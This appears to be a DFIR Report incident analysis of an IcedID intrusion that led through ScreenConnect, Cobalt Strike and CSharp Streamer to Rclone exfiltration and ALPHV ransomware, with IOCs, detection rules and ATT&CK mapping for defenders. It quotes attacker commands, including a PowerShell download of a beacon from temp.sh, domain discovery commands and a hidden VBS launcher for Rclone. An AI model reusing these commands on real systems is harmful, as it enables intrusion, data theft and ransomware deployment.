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CASE ARTIFACTS

alphv

cobaltstrike

icedid

ransomware

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

June 10, 2024

Key Takeaways

- In October 2023, we observed an intrusion that began with a spam campaign, distributing a forked IcedID loader.
- The threat actor used Impacket’s wmiexec and RDP to install ScreenConnect on multiple systems, enabling them to execute various commands and deploy Cobalt Strike beacons.
- Their toolkit also included CSharp Streamer, a RAT written in CSharp with numerous functionalities, as documented [here](#).
- The attacker used a custom tool to stage, and exfiltrate data, using Rclone.
- Eight days after initial access, ALPHV ransomware was deployed across all domain joined Windows systems.

An audio version of this report can be found on [Spotify](#), [Apple](#), [YouTube](#), [Audible](#), & [Amazon](#).

The DFIR Report Services

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Five new sigma rules were created from this report and added to our Private sigma Rules

Our Threat Feed was tracking the Cobalt Strike server in this case days before this case.

- **[Private Threat Briefs](#)**: Over 25 private reports annually, such as this one but more concise and quickly published post-intrusion.
- **[Threat Feed](#)**: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.
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Case Summary.

This intrusion began in October 2023 with a malicious email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS) and a benign README file. We assess with high confidence that this email was part of a spam campaign delivering a forked variant of IcedID. First reported by [ProofPoint](#) in February 2023, this forked IcedID variant lacks banking functionality and prioritizes payload delivery. Upon user interaction with the archive’s contents, the VBS file was executed, initiating the embedded forked IcedID loader.

This was followed by the creation of a scheduled task to maintain persistence on the beachhead. The forked IcedID loader then communicated with a command and control server, leading to the dropping and execution of another IcedID DLL. Approximately two minutes after execution, the first round of discovery was observed using Windows native binaries, mirroring the activity seen in previously reported [IcedID cases](#).

Around two hours into the intrusion, the threat actor installed ScreenConnect on the beachhead using a renamed installer binary, “toovey.exe.” They executed multiple commands on the host via ScreenConnect. These commands included Windows utilities such as nltest and net for reconnaissance. They also used PowerShell cradles, bitsadmin, and certutil to attempt retrieval of Cobalt Strike beacons on the beachhead. They had a few stumbles while trying to download the Cobalt Strike beacons using [temp.sh](#), resulting in downloading the HTML of the website rather than their intended payload file.

Once the Cobalt Strike beacons were executed, they established communication with the Cobalt Strike command and control server. Within 20 minutes of this activity, a new payload, cslite.exe (CSharp Streamer C2), was dropped on the beachhead. CSharp Streamer is a multi-function remote access trojan that was first reported in 2021. During this intrusion, it was first used to access the LSASS process on the beachhead for credential access; and around 40 minutes after that, the threat actor performed a dcsync operation from the beachhead host to one of the domain controllers. The threat actor then copied a renamed ScreenConnect installer from the beachhead to a domain controller over SMB. The installation was completed using Impacket’s wmiexec script to remotely run the ScreenConnect installer.

CSharp Streamer payloads. Although they executed the files, we did not observe any network traffic to a command and control server at that time. Activity then ceased for approximately eight hours.

On the second day, the threat actor returned and performed network discovery on the domain controller using [SoftPerfect's network scanner](#). They then initiated an RDP connection from the domain controller to a backup server. The threat actor reviewed backups and running processes before dropping both a CSharp Streamer binary and a previously used ScreenConnect installer. These were then executed over the RDP session. Next, a Cobalt Strike beacon was run, and LSASS was accessed on the host.

Around eleven hours later, the threat actor dropped several Cobalt Strike beacons and attempted to execute them; however, no new command and control traffic was observed. The threat actor quickly removed the files. Four hours later, another ScreenConnect installer was dropped on the backup server and executed using wmiexec. A new RDP connection was then initiated to a second domain controller, and nmap was run again. Following this, ScreenConnect was installed on the second domain controller, and an RDP session was started from this domain controller to a file server. On the file server, both a Cobalt Strike beacon and the ScreenConnect installer were dropped and executed via the RDP session.

After three days of no significant activity, the threat actor returned. They dropped and executed a new ScreenConnect installer on the backup server via wmiexec and ran nmap again. Using RDP, they connected to the file server and used Mozilla Firefox to preview a few financial documents before running nmap there as well.

The following day, a custom tool named “confucius_cpp” was dropped on the file server. Its functionalities included aggregation, staging, and compression of sensitive files. We observed the threat actor performing Google searches for the keyword “rclone” and subsequently downloading the rclone application on the file server. Instead of direct execution, the Rclone binary was started using a VBS script. Upon execution of this script, the previously staged data was successfully exfiltrated using Rclone to a remote server.

On day seven of the intrusion, a RDP connection was initiated from the beachhead to the backup and the file server using CSharp Streamer. New ScreenConnect installers appear yet again and followed the same WMI execution pattern as before.

On the final day of the intrusion, the threat actor proceeded to push toward their final objectives. From the backup server, they ran a fresh nmap sweep and began staging both a ScreenConnect installer and an ALPHV ransomware binary. First, they used xcopy to stage the ScreenConnect installer across all Windows hosts in the domain and then executed it using a WMI command. This was then repeated for the ALPHV ransomware payload. During the execution, we observed the threat actor deleting all the backups interactively. Upon completion of the ransomware execution, a ransom note was left behind on the hosts. The time to ransomware (TTR) was around 180 hours, over the course of 8 days.

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Analysts

Analysis and reporting completed by [@yatinwad](#), and UC2.

Initial Access

Initial access began with a malicious e-mail. The malicious spam campaign can be linked to a publicly reported campaign from [@JAMESWT_MHT](#) encouraging victims to download

Execution

ScreenConnect

Once IcedID was operational, the threat actor used it to install the RMM tool ScreenConnect, renamed as toovey.exe.

Throughout the intrusion the threat actor dropped several more renamed ScreenConnect installers, usually employed after moving laterally to a new host and then executing it through Impacket’s wmiexec.py script:

Besides execution with wmiexec.py, some installers were executed during the threat actor RDP sessions:

ScreenConnect was then used to execute various commands. This can be observed in logs, as ScreenConnect drops the desired script on disk, followed by the corresponding interpreter, as discussed in a previous [report](#). This can be seen in various events, such as Security Event ID 4688 or Sysmon Event 1, as displayed below.

Cobalt Strike

As in most intrusions we document, Cobalt Strike beacons were used in this intrusion. On the beachhead host, using ScreenConnect, the threat actor tried to download malicious Cobalt Strike beacons using bitsadmin, without success.

Following this failure, they used another LOLBin named certutil to download their payloads, again via ScreenConnect. This behavior was repeated to download other Cobalt Strike beacons.

PowerShell was another tool used to retrieve Cobalt Strike beacons, again with some failures, and yet again using ScreenConnect.

In addition to the previously mentioned methods of retrieving additional payloads, there was another instance where the attackers used [temp.sh](#) to host their malware. However, a failure occurs when attempting to directly download a file from these links. Instead of obtaining the actual file, users end up downloading an HTML presentation page that prompts them to click a link to retrieve the file.

```
powershell Invoke-WebRequest "http://temp.sh/VSlAV/http64.exe" -
OutFile C:\programdata\rr.exe
```

On another occasion, PowerShell usage was successful, and in those cases using Sysmon’s events we can trace child processes from PowerShell ParentCommandLine. For instance, the following display shows a payload used to launch https64.dll, another Cobalt Strike beacon.

Because the beacon was using plain HTTP, the retrieved PowerShell payload can be extracted from the network communications.

As documented in [Cobalt Strike, a Defender’s Guide part 1](#) and [part 2](#), the attackers used Cobalt Strike’s default pipe names, which can be easily detected.

Impacket

As part of their toolkit, the threat actor used Impacket’s wmiexec.py script to perform actions. This activity can be easily observed in logs because of the default redirect of its output to \\127.0.0.1\ADMIN\$__%timestamp% (as visible in the [source code](#)).

CSharp Streamer

During the intrusion, the threat actor deployed a binary named “cslite.exe” on the beachhead host. Upon investigation, we identified this binary as a RAT known as CSharp Streamer, thanks to an excellent [write-up](#) by Hendrik Eckardt. This malware combines many different functions and is a very capable remote access trojan. During this intrusion, we observed it dumping credentials, proxying RDP traffic, and providing command and control communications for the threat actor.

We were able to confirm the tool using memory analysis, and identifying known functions and commands in the previously linked report.

When executed, the tool writes a .NET executable to the %USERPROFILE%\AppData\Local\Temp folder using a .tmp extension and then loads it into memory, as seen in the Sysmon Event ID 7 event:

Using dynamic analysis from running the sample in a malware analysis sandbox, we can observe the injected .NET assemblies:

Persistence

IcedID

IcedID registered a scheduled task for persistence, in the same manner as documented in [several](#) other [reports](#).

The task was registered to be executed every hour after logon as indicated respectively by the following XML tags:

```
<Interval>PT1H</Interval>
```

```
<LogonTrigger id="LogonTrigger"><Enabled>>true</Enabled></LogonTrigger>
```

ScreenConnect

Upon installation, ScreenConnect persists across reboots with an auto-start service. This can be seen using the built-in System event logs (event ID 7045).

Should the System event logs be unavailable (for instance if cleared by an threat actor), the service configuration is saved inside the SYSTEM registry file, which can be analyzed using Eric Zimmerman’s [Registry Explorer](#) tool, in the HKLM\CurrentControlSet\Services\ location.

Anomali Threat Research explained the parameters in their [article](#) :

- *e* as session type, can be *Support*, *Meeting*, *Access*.
- *y* as process type, can be *Guest* or *Host*.
- *h* as the URI to the relay service’s URI.
- *p* as the relay service’s port.
- *s* as a globally unique identifier for client identification.
- *k* as the encoded encryption key, used for identity verification.
- *t* as the optional session name.

Defense Evasion

Upon moving laterally to a backup server, we observed Cobalt Strike injection into legitimate process “winlogon.exe” and “rundll32.exe”.

By relying on memory captures, defenders may also have other detection methods. Here, by processing the acquired memory with [MemprocFS](#) and using the [findevil](#) command, we can find an injected beacon in winlogon.exe.

During the intrusion, the threat actor deleted the renamed ScreenConnect installers from the backup server and the file server using the “del” command, in an attempt to cover their tracks.

Credential Access

Credentials were extracted from LSASS (Local Security Authority Subsystem), a technique commonly seen during similar intrusions. On day one, through hands-on activity, the threat actor executed cslite.exe (a CSharp Streamer file dropped on the Desktop of a compromised user), which was used to access the LSASS process. Process access can be seen using Sysmon event ID 10, as displayed below.

[Microsoft](#) documented the granted accesses, which are the following:

- 0x1010: PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010)
- 0x1FFFFFF: PROCESS_ALL_ACCESS

Another data point to look for is the UNKNOWN string in the CallTrace, which indicates Sysmon was not able to resolve the address of code from where the OpenProcessfunction was called, potential indication of a DLL in memory.

file:

In another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should happen rarely in a production environment, and once again, the CallTrace can also help as CallTrace with ntdll.dll, dbghelp.dll or dbgcore.dll ([source 1](#), [source 2](#)) should be monitored.

Finally, on the second day, we can see yet another access to LSASS, this time from rundll32.exe, once again using access 0x1010 and with UNKNOWN in the CallTrace. This time, rundll32.exe was spawned by PowerShell, which was tasked to download and execute a Cobalt Strike beacon.

Around 40 minutes after the LSASS dump by the “cslite.exe” executable, we observed a traffic spike from the beachhead host to a domain controller. Reviewing this network traffic using the Suricata rules from [Didier Stevens](#), we discovered potential Mimikatz dcsync activity between the hosts.

At the same time we found Event ID 4662 logs on the domain controller, confirming a sync operation requested by the “Administrator” account:

Specifically, we were looking for the [Domain-DNS Class\(object\) — Schema GUID: 19195a5b-6da0–11d0-afd3–00c04fd930c9](#) and [DS-Replication-Get-Changes-All — Schema GUID: 1131f6ad-9c07–11d1-f79f-00c04fc2dcd2](#) as explained in this [SpectreOps post](#), to detect this dcsync activity. Using these two points of evidence, we can say with good confidence that the threat actor performed a dcsync operation.

Discovery

Minutes after the initial compromise, a first round of discovery was observed using native Windows built-in utilities, spawning from the IcedID malware.

```
cmd.exe /c chcp >&2
ipconfig /all
systeminfo
net config workstation
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
net group "Domain Admins" /domain
```

Later on, the threat actor used ScreenConnect to run other discovery commands, on several occasions

```
nltest /dclist:
net group "domain admins" /domain
net group "Domain Computers" /domain
net group "domain admins" /domain
net group "enterprise admins" /domain
nltest /dclist:
net group "domain admins" /domain
quser
ipconfig /all
net group "domain computers" /domain
```

```
nltest /dclist:
```

On day two, day five, and day eight, the threat actor performed rounds of network discovery using [SoftPerfect netscan](#).

Each time, the scan goes over the same IP address space, and scans for the ports 135 (RPC), 445 (SMB) and 3389 (RDP), with a few extras related to the [Veeam](#) backup solutions.

Lateral Movement

The renamed ScreenConnect installer was copied from the beachhead to domain controllers, a backup server, and a file server using SMB. As explained in the [execution section](#), the installer was also executed via Impacket’s wmiexec.py script, which resulted in the ScreenConnect installation. Multiple commands were executed on the compromised hosts via ScreenConnect command functionality.

Event ID 5145 logs:

RDP was used extensively during the intrusion by the threat actor to move laterally.

While the threat actor most frequently used the native Windows RDP clients, on at least one occasion they proxied their RDP session via the CSharp Streamer.

When doing this, they left a trace of their remote host name logged under Event ID 4778:

```
77724F2
```

Collection

Before initiating the exfiltration process, a custom tool called `confucius_cpp.exe` was dropped on a file server. This tool was used to aggregate, stage, and compress sensitive data files, using LDAP and creating multiple ZIP archives.

As seen when executing the tool in a lab environment, the LDAP query with search filter (&(objectClass=computer)) is first made to look for computers, as documented in [Microsoft learn website](#).

Once the LDAP query is complete, the tool enumerates shared folders, filtering out some uninteresting folders such as NETLOGON or SYSVOL.

On each selected folder, the tool will look for files based on keywords (in the screenshot they’re after the words *security_reports* and *finance*) before compressing data. This automates the collection phase, ensuring swift action across the whole network.

The attacker also installed Firefox to preview a few documents. This can be seen by looking at the process command line, which contains the url argument, as displayed below.

Command and Control

The threat actor leveraged the following methods to access the hosts within the network:

- IcedID
- Cobalt Strike
- CSharp Streamer
- ScreenConnect

IcedID

The forked IcedID loader established connection to command and control server modalefastnow[.]com over port 443, which resolved at the time to 212.18.104.12. The contents of the network connection matched a malware rule in the Emerging Threats Open ruleset “ET MALWARE Win32/IcedID Request Cookie”.

After the initial infection, the second stage IcedID DLL communicated with the following C2 servers:

IP	Port	Domain	JA3
173.255.204.62	443	jkbarmossen[.]com	a0e9f5d64349fb13191bc781f
94.232.46.27	443	evinakortu[.]com	a0e9f5d64349fb13191bc781f1138de370e523e824bbca92c
94.232.46.27	443	hofsaaalos[.]com	a0e9f5d64349fb13191bc781f1138de370e523e824bbca92c
77.105.140.181	443	jerryposter[.]com	a0e9f5d64349fb13191bc781f
77.105.142.135	443	skrechelres[.]com	a0e9f5d64349fb13191bc781f
212.18.104.12	443	modalefastnow[.]com	a0e9f5d64349fb13191bc781f

```
ja4: t12d190800_d83cc789557e_7af1ed941c26
ja4: t10d070700_c50f5591e341_c39ab67fec8e
ja4s: t120400_c030_12a20535f9be
ja4x: 96a6439c8f5c_96a6439c8f5c_795797892f9c
```

Cobalt Strike

The threat actor dropped Cobalt Strike beacons across hosts during the intrusion, communicating with the following IP addresses.

IP	Port	Domain	JA3	JA3s	AS Organization	ASN
85.209.11.48	80	N/A	N/A	N/A	Chang Way Technologies	5752

The [DFIR Threat intelligence feeds](#) tracked this infrastructure as a live Cobalt Strike server starting 2023-09-29 through 2023-10-30.

The following URIs were accessed for 85.209.11.48:

Using MemProcFS to process the memory from the backup server, we were able to extract the minidump for the injected Cobalt Strike process. Using the minidump, the beacon configuration was able to be parsed using [1768.py](#):

```
File: minidump.dmp
Config found: xorkey b'.' 0x00000000 0x00010000
0x0001 payload type                                0x0001 0x0002 0 windows-
beacon_http-reverse_http
0x0002 port                                          0x0001 0x0002 80
0x0003 sleeptime                                    0x0002 0x0004 60000
0x0004 maxgetsize                                   0x0002 0x0004 1048576
0x0005 jitter                                       0x0001 0x0002 0
0x0007 publickey                                    0x0003 0x0100
30819f300d06092a864886f70d010101050003818d0030818902818100a70991d6
9d816a601ffa80976473830f0d3b41276d2790401ddedb18e2d3cab3c315e32223
25be42b65adb2878f33f5a03ff5010b23e842a510c1482ad6a42f1e7e5726eb318
13e7437640ed7879955f401e172c34d3517241596dd41f8e48d3d1b1c288e6c875
2ff65dc27accba4ba9cd6d0e4de6196cea4da480d3b99d0ed0203010001000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000 Has known
private key
0x0008 server,get-uri                              0x0003 0x0100
'85.209.11.48,/load'
0x0043 DNS_STRATEGY                                0x0001 0x0002 0
0x0044 DNS_STRATEGY_ROTATE_SECONDS                 0x0002 0x0004 -1
0x0045 DNS_STRATEGY_FAIL_X                          0x0002 0x0004 -1
0x0046 DNS_STRATEGY_FAIL_SECONDS                    0x0002 0x0004 -1
0x000e SpawnTo                                     0x0003 0x0010 (NULL ...)
0x001d spawnto_x86                                 0x0003 0x0040
'%windir%\\syswow64\\rundll32.exe'
0x001e spawnto_x64                                 0x0003 0x0040
'%windir%\\sysnative\\rundll32.exe'
0x001f CryptoScheme                                0x0001 0x0002 0
0x001a get-verb                                     0x0003 0x0010 'GET'
0x001b post-verb                                    0x0003 0x0010 'POST'
0x001c HttpPostChunk                               0x0002 0x0004 0
0x0025 license-id                                  0x0002 0x0004 1580103824
Stats uniques -> ips/hostnames: 210 publickeys: 92
0x0026 bStageCleanup                               0x0001 0x0002 0
```

```
(compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BOIE9;ENUS)'
0x000a post-uri                                0x0003 0x0040
'/submit.php'
0x000b Malleable_C2_Instructions                0x0003 0x0100
  Transform Input: [7:Input,4]
  Print
0x000c http_get_header                         0x0003 0x0200
  Build Metadata: [7:Metadata,3,6:Cookie]
  BASE64
  Header Cookie
0x000d http_post_header                        0x0003 0x0200
  Const_header Content-Type: application/octet-stream
  Build SessionId: [7:SessionId,5:id]
  Parameter id
  Build Output: [7:Output,4]
  Print
0x0036 HostHeader                             0x0003 0x0080 (NULL ...)
0x0032 UsesCookies                            0x0001 0x0002 1
0x0023 proxy_type                             0x0001 0x0002 2 IE
settings
0x003a TCP_FRAME_HEADER                       0x0003 0x0080 '\x00\x04'
0x0039 SMB_FRAME_HEADER                       0x0003 0x0080 '\x00\x04'
0x0037 EXIT_FUNK                              0x0001 0x0002 1
0x0028 killdate                               0x0002 0x0004 0
0x0029 textSectionEnd                         0x0002 0x0004 0
0x002b process-inject-start-rwx               0x0001 0x0002 64
PAGE_EXECUTE_READWRITE
0x002c process-inject-use-rwx                 0x0001 0x0002 64
PAGE_EXECUTE_READWRITE
0x002d process-inject-min_alloc               0x0002 0x0004 0
0x002e process-inject-transform-x86           0x0003 0x0100 (NULL ...)
0x002f process-inject-transform-x64           0x0003 0x0100 (NULL ...)
0x0035 process-inject-stub                    0x0003 0x0010
'"+"\x8f\'\u03c0\x8d\u0399U\x9eic~|H'
0x0033 process-inject-execute                 0x0003 0x0080
'\x01\x02\x03\x04'
0x0034 process-inject-allocation-method 0x0001 0x0002 0
0x0000
Guessing Cobalt Strike version: 4.3 (max 0x0046)
Sanity check Cobalt Strike config: OK
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x005e2f3f
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x00624b3f
```

CSharp Streamer

The “cslite.exe” CSharp Streamer executable communicated to the IP address 109.236.80.191. During the intrusion, we observed traffic to it across various ports, including 135, 139, 80, 443, and 3389. Most traffic was observed at 443 and 3389. Looking at the memory of the “cslite.exe” run in a sandbox, we can extract the configured communication preferences for the trojan:

The malware uses [WebSockets](#) for communication, as observed with the wss:// in the URL. We also see that the communication was setup to use [socket.io](#), to proxy the communication. And if the malware cannot reach a specific port, it rotates through a list of various ports, likely to both evade ports blocked in the victim firewall and help obfuscate communication by changing the port in use throughout an intrusion.

IP	Port	Domain	Ja3
109.236.80.191	443	www.i2rtqyj[.]ekz	c12f54a3f91dc7bafd92cb59fe009d

```
ja4: t12i210600_76e208dd3e22_2dae41c691ec
ja4s: t120200_c02f_ec53b3cc8a64
ja4s: t120400_c02f_12a20535f9be
ja4x: bbd6cc0fca29_4ce939b68fae_79faaa53868b
```

During the intrusion, we observed several Zeek notice messages alerting on the self-signed certificate used by the CSharp Streamer command and control server.

Post the initial forked IcedID loader infection, the threat actor deployed ScreenConnect on the beachhead using a renamed binary “toovey.exe”. Later, ScreenConnect was installed on multiple systems by dropping renamed installer and executing it through Impacket’s wmiexec.py script.

Exfiltration

While Firefox was used to preview documents, it was also used to download Rclone. When the process command line is not available, defenders can look for web history artifacts. In Firefox, web history artifacts are [well documented](#) and can be directly looked at using an SQLite browser.

Rclone was dropped on the file server. This can be detected by looking at file creation, for instance using the event ID 11 from Sysmon.

Rclone was not directly started, but was launched though a VBS script named nocmd.vbs, which itself executes rcl.bat, which in turn executes Rclone.

```
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "c:\programdata\rcl.bat" & Chr(34), 0
Set WshShell = Nothing
```

Before that, the threat actor used the [config Rclone command](#), which performs the following action according to the documentation:

“ enter an interactive configuration session where you can setup new remotes and manage existing ones

Upon execution, network artifacts show an increase in egress traffic to the exfiltration server on port 22 (SSH). Increase of egress traffic, especially to previously unknown hosts or suspicious ports can be used to detect early exfiltration attempts. Indeed, below is presented a chart of traffic to port 22 during the whole course of this intrusion.

Exfiltration Server data:

IP	Port	Domain	AS Organization	ASN	Geolocation Country
----	------	--------	--------------------	-----	------------------------

			D.V.		
--	--	--	------	--	--

Impact

On the eighth day of the intrusion, the threat actor moved toward their final objective, deploying ALPHV Ransomware. This started with the threat actor staging two files on the backup server.

“setup.exe,” which was dropped twice, was just the latest ScreenConnect installer the adversary employed during the intrusion. “BNUfUOmFT2.exe” was the ransomware binary.

First, they used the [xcopy](#) Windows utility to move the ScreenConnect installer across the domain in the root of C\$:

Second, they remotely ran the installer on hosts using WMI commands:

Third, they repeated the process, copying the ransomware payload from the backup server to the domain joined hosts in the network.

Finally, they used this same method to execute the ransomware remotely via WMI:

On the remote hosts, the “WMIPrvSE.exe” was observed executing the task.

During the ransomware deployment phase, we observed the threat actor deleting all the backups interactively.

Timeline

Diamond Model

Indicators

Atomic

```
CobaltStrike
85.209.11[.]48

CSharp Streamer
109.236.80[.]191

Data exfiltration
217.23.12[.]8

Forked IcedID Loader
212.18.104[.]12 / modalefastnow[.]com

2nd Stage IcedID payload
92.118.112[.]113 / hofsaalos[.]com
173.255.204[.]62 / jkbarmossen[.]com
94.232.46[.]27 / evinakortu[.]com
77.105.140[.]181 / jerryposter[.]com
77.105.142[.]135 / skrechelres[.]com

URLs
http[:]//85.209.11[.]48:80/download/test1.exe
http[:]//85.209.11[.]48:80/download/http64.exe
http[:]//85.209.11[.]48:80/download/csss.exe
http[:]//85.209.11[.]48:80/ksajSk
http[:]//85.209.11[.]48:80/ksaid
http[:]//temp[.]sh/VSlAV/http64.exe
```

Computed

```
cscs.exe
99d8c3e7806d71a2b6b28be525c8e10e
59791ec1c857d714f9b4ad6c15a78191206a7343

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cscss.exe
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Search ...


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
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c2ddb954877dcfbb62fd615a102ce5fa69f4525abc1884e8fe65b0c2b120cfd4

cscssss.exe
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7d2e705dcaa9f36fb132b7ff329f61dd5d0393c28dcd53b2be1e3ba85c633360

ccs.exe
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bd4876f7efbd18a03bbb401a5dc77ed68ef95c72a3f7be83cef39a4515e0c476

rclone.exe
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BNUfUOmFT2.exe
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94d6395dcab01250650e884f591956464d582a4f1f5da948055e6d2f0a215ace

confucius_cpp.exe
fb34b1fb80b053e69d89af5330cd7d4b
e97b00ef58fe081170137536f28df590dbb41a0e

dfa8c282178a509346fb0154e6dbd5fbb0b56c38894ce7d244f5ca26d6820e67

cslite.exe
642bf60f06bb043c4a74d0501597cf5e
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4103cc8017409963b417c87259af2a955653567cdbf7d5504198dd350f9ef9c1

https64.dll
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http64.dll
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ccslt.exe
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iwiqocacod.dll
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Mentoring
and Coaching

```
JNOV0135_7747811.zip
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[2023.10.11_08-07].vbs
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42b188e2e015a72accc50fcbde2d2c81f5258d0b

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0370-1.dll
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fab34d1f0f906f64f95b9f244ae1fe090427e606a9c808c720e18e93a08ed84d

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6f3a02674b6bbf05af8a90077da6e496cc47dda9101493b8103f0f2b4e4fd958
```

Detections

Network

```
ET INFO Executable Download from dotted-quad Host
ETPRO HUNTING Windows BITS UA Retrieving EXE
ET HUNTING Suspicious BITS EXE DL From Dotted Quad
ET POLICY PE EXE or DLL Windows file download HTTP
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
ETPRO HUNTING Windows BITS UA Retrieving EXE M2
ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request
ETPRO MALWARE Likely Evil Certutil Retrieving EXE
ThreatFox payload delivery (domain - confidence level: 100%)
ET MALWARE Terse alphanumeric executable downloader high
likelihood of being hostile
ThreatFox Cobalt Strike botnet C2 traffic (ip:port - confidence
level: 80%)
ET INFO Packed Executable Download
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake
Browser 1
ET MALWARE Cobalt Strike Beacon Observed
ET MALWARE Win32/IcedID Requesting Encoded Binary M4
```

Sigma

Search rules on [detection.fyi](#) or [sigmasearchengine.com](#)

DFIR Report Public Repo:

```
8a0d153f-b4e4-4ea7-9335-892dfbe17221: NetScan Share Enumeration
Write Access Check
dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f: CHCP CodePage Locale Lookup
```

DFIR Report Private Repo:

```
7019b8b4-d23e-4d35-b5fa-192fffb8cb3ee: Use of Rclone to exfiltrate
data over an SSH channel
a09079c2-e4af-4963-84d2-d65c2fb332f5: Detection of CertUtil Misuse
for Malicious File Download
6f77de5c-27af-435b-b530-e2d07b77a980: Impacket Tool Execution
6fc673ac-ec2f-4de8-8a14-a395f1b2b531: Potential CSharp Streamer
RAT loading binary from APPDATA
879ddba7-5cb9-484f-88a4-cld87034166f: Suspicious ScreenConnect
Script Execution
```

Sigma Repo:

```
90f138c1-f578-4ac3-8c49-eecfd847c8b7: BITS Transfer Job Download
From Direct IP
10c14723-61c7-4c75-92ca-9af245723ad2: HackTool - Potential
Impacket Lateral Movement Activity
b1f73849-6329-4069-bc8f-78a604bb8b23: Remote Access Tool -
ScreenConnect Remote Command Execution
90b63c33-2b97-4631-a011-ceb0f47b77c3: Suspicious Execution From
GUID Like Folder Names
19b08b1c-861d-4e75-a1ef-ea0c1baf202b: Suspicious Download Via
Certutil.EXE
d059842b-6b9d-4ed1-b5c3-5b89143c6ede: File Download Via Bitsadmin
e37db05d-d1f9-49c8-b464-ceela4b11638: PUA - Rclone Execution
7090adee-82e2-4269-bd59-80691e7c6338: Console CodePage Lookup Via
CHCP
d5601f8c-b26f-4ab0-9035-69e11a8d4ad2: CobaltStrike Named Pipe
c8557060-9221-4448-8794-96320e6f3e74: Windows PowerShell User
Agent
1edff897-9146-48d2-9066-52e8d8f80a2f: Suspicious Invoke-WebRequest
Execution With DirectIP
0ef56343-059e-4cb6-adc1-4c3c967c5e46: Suspicious Execution of
Systeminfo
903076ff-f442-475a-b667-4f246bcc203b: Nltest.EXE Execution
5cc90652-4cbd-4241-aa3b-4b462fa5a248: Potential Recon Activity Via
Nltest.EXE
624f1f33-ee38-4bbe-9f4a-088014e0c26b: IcedID Malware Execution
Patterns
```

Yara

Rules/blob/main/24952/24952.yar

MITRE ATT&CK


24952 - IcedID Brings ScreenConnect and Csharp Streamer to ALPHV Ransomware Deployment		
	Tools	Technique
Initial Access		Phishing - T1566
Execution	IcedID	Malicious File - T1204.002 Visual Basic - T1059.005 PowerShell - T1059.001 Windows Command Shell - T1059.003
Persistence	IcedID ScreenConnect	Scheduled Task - T1053.005
Privilege Escalation		
Defense Evasion		Regsvr32 - T1218.010 Rundll32 - T1218.011 Indicator Removal: File Deletion - T1070.004 Process Injection -T1055 BITS Jobs - T1197
Credential Access	CSharp Streamer — Mimikatz	LSASS Memory - T1003.001 DCSync - T1003.006
Discovery	net chcp nltest ipconfig systeminfo route quser SoftPerfect netscan	Domain Groups - T1069.002 Domain Trust Discovery - T1482 System Language Discovery - T1614.001 Local Account - T1087.001 Domain Account - T1087.002 Network Share Discovery - T1135 Remote System Discovery - T1018 System Information Discovery - T1082
Lateral Movement		Remote Desktop Protocol - T1021.001
Collection	Confucius_cpp.exe	Archive via Utility - T1560.001 Data from Information Repositories - T1213 Data from Network Shared Drive - T1039
Command and Control	IcedID ScreenConnect CSharp Streamer Cobalt Strike	Web Protocols - T1071.001 Remote Access Software - T1219 Ingress Tools Transfer - T1105
Exfiltration	Rclone	Automated Exfiltration - T1020
Impact	ALPHV Ransomware	Data Encrypted for Impact - T1486


LSASS Memory - T1003.001
DCSync - T1003.006
System Network Configuration Discovery - T1016
Remote System Discovery - T1018
Automated Exfiltration - T1020
Remote Desktop Protocol - T1021.001
System Owner/User Discovery - T1033
Data from Network Shared Drive - T1039
Commonly Used Port - T1043
Scheduled Task - T1053.005
PowerShell - T1059.001
Windows Command Shell - T1059.003
Visual Basic - T1059.005
Domain Groups - T1069.002
Web Protocols - T1071.001
Domain Accounts - T1078.002
System Information Discovery - T1082


Domain Account - T1087.002
Network Share Discovery - T1135
BITS Jobs - T1197
Malicious File - T1204.002
Data from Information Repositories - T1213
Regsvr32 - T1218.010
Rundll132 - T1218.011
Remote Access Software - T1219
Domain Trust Discovery - T1482
Data Encrypted for Impact - T1486
Archive via Utility - T1560.001
Phishing - T1566
Service Execution - T1569.002
System Language Discovery - T1614.001
Indicator Removal: File Deletion - T1070.004


Internal case #TB24952 #PR29648


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